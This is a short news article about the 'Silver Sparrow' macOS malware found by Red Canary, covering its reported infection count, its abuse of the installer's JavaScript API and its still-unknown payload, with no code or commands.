The other day, the first malware that runs natively on an M1 Mac was discovered, followed by the second, which reportedly infected about 30,000 units, including Intel Macs.
The malware, named “Silver Sparrow” by security firm Red Canary, has infected 29,139 macOS systems in 153 countries, especially in the United States, United Kingdom, Canada, France and Germany.
This number is a total that includes Intel Macs, but Red Canary hasn’t disclosed how many of them are M1 Macs.
The malware is exploiting the JavaScript API of the macOS installer to execute suspicious commands. However, after more than a week of observing behavior with Red Canary and its research partners, the final payload (the code that behaves maliciously in the malware) has not been confirmed, and the real threat remains a mystery.
At the time of this report, Silver Sparrow only displays a window with the message “Hello, world!” When run on an Intel Mac, and a red window with the message “You did it!” for binaries running natively on the M1.
Nevertheless, Red Canary claims that it may be a “quite serious threat” because of the widespread confirmed infections mentioned above. “Potential M1 chip compatibility, global spread, relatively high infection rates, and operational maturity” warns us that we are in a unique position to deliver influential payloads instantly.
When the first M1 native malware was reported, it was pointed out that while it was easy to compile existing malware for M1, most anti-virus software could not detect malware for M1. As the sales of M1 Macs accelerate and the penetration rate increases, it seems that Apple and cyber security companies will also be required to respond quickly.